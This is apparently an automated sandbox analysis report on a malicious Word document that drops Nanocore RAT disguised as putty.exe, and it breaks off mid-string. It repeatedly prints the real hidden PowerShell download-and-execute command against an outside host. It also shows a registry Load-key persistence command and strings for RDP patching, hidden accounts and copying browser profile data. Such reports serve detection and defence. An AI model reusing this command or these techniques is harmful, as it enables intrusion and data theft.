        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: putty[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: images.exe.13.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty[1].exe.0.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: putty.exe.3.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: putty.exe.6.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 10.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 10.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 11.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 11.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 12.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 12.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: images.exe.13.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 13.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@45/31@24/2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005708A2 AdjustTokenPrivileges,11_2_005708A2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0057086B AdjustTokenPrivileges,11_2_0057086B
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,13_2_00410B38
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,15_2_00410B38
        Source: C:\ProgramData\images.exeCode function: 21_3_042394E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,21_3_042394E0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,13_2_0041405F
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,13_2_004148B6
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,13_2_00415169
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_0040D33C
        Source: C:\Users\user\AppData\Roaming\putty.exeFile created: C:\Program Files\Microsoft DN1
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$W PO1100372954 -.doc
        Source: C:\Windows\System32\drvinst.exeMutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{6a1c2465-7ac5-4f1d-acc5-ef04fcf454c9}
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCDE9.tmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
        Source: C:\Users\user\AppData\Roaming\putty.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: images.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: images.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: images.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
        Source: images.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: images.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: images.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: NEW PO1100372954 -.docReversingLabs: Detection: 23%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
        Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
        Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: unknownProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{62BE5D10-60EB-11D0-BD3B-00A0C911CE86}\InprocServer32
        Source: C:\ProgramData\images.exeFile written: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
        Source: C:\Users\user\AppData\Roaming\putty.exeDirectory created: C:\Program Files\Microsoft DN1
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: System.Management.Automation.pdbBBfop source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, images.exe
        Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe
        Source: Binary string: wuser32.pdb source: images.exe
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2096511156.0000000002960000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2100589485.00000000029A0000.00000002.00000001.sdmp, putty.exe, 0000000A.00000002.2117131809.0000000000770000.00000002.00000001.sdmp

        Data Obfuscation:

        Suspicious powershell command line found
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,13_2_004060B0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_00207735 push esp; retf 10_2_00207736
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002077E1 push cs; retf 10_2_002077E6
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002084E1 push esp; retf 10_2_002084E2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_00206CC1 push esp; retf 10_2_00206CC2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_006A0E32 push 00000000h; retn 0010h10_2_006A0E40
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00287735 push esp; retf 11_2_00287736
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_002877E1 push cs; retf 11_2_002877E6
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_002884E1 push esp; retf 11_2_002884E2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00286CC1 push esp; retf 11_2_00286CC2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004011C0 push eax; ret 13_2_004011D4
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004011C0 push eax; ret 13_2_004011FC
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041C225 pushad ; retn 0041h13_2_0041C22D
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004174D1 push ebp; retf 13_2_00417584
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00417570 push ebp; retf 13_2_00417584
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_004011C0 push eax; ret 15_2_004011D4
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_004011C0 push eax; ret 15_2_004011FC
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0041C225 pushad ; retn 0041h15_2_0041C22D
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_004174D1 push ebp; retf 15_2_00417584
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00417570 push ebp; retf 15_2_00417584
        Source: C:\ProgramData\images.exeCode function: 17_2_00147735 push esp; retf 17_2_00147736
        Source: C:\ProgramData\images.exeCode function: 17_2_00146CC1 push esp; retf 17_2_00146CC2
        Source: C:\ProgramData\images.exeCode function: 17_2_001477E1 push cs; retf 17_2_001477E6
        Source: C:\ProgramData\images.exeCode function: 17_2_001484E1 push esp; retf 17_2_001484E2
        Source: C:\ProgramData\images.exeCode function: 21_3_042A5220 push eax; ret 21_3_042A522D
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51033751288

        Persistence and Installation Behavior:

        Tries to download and execute files (via powershell)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers,13_2_0040D2B8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,13_2_0040290E
        Source: C:\Users\user\AppData\Roaming\putty.exeFile created: C:\ProgramData\images.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\ProgramData\images.exeFile created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\ProgramData\images.exeFile created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exeFile created: C:\Windows\System32\rfxvmt.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe
        Source: C:\ProgramData\images.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,13_2_0040A36F
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,13_2_00409E2D
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,13_2_00413695
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,15_2_0040A36F
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,15_2_00409E2D
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,15_2_00413695

        Boot Survival:

        Creates an undocumented autostart registry key
        Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Load
        Source: C:\ProgramData\images.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_0040D3A8

        Hooking and other Techniques for Hiding and Protection:

        Contains functionality to hide user accounts
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip 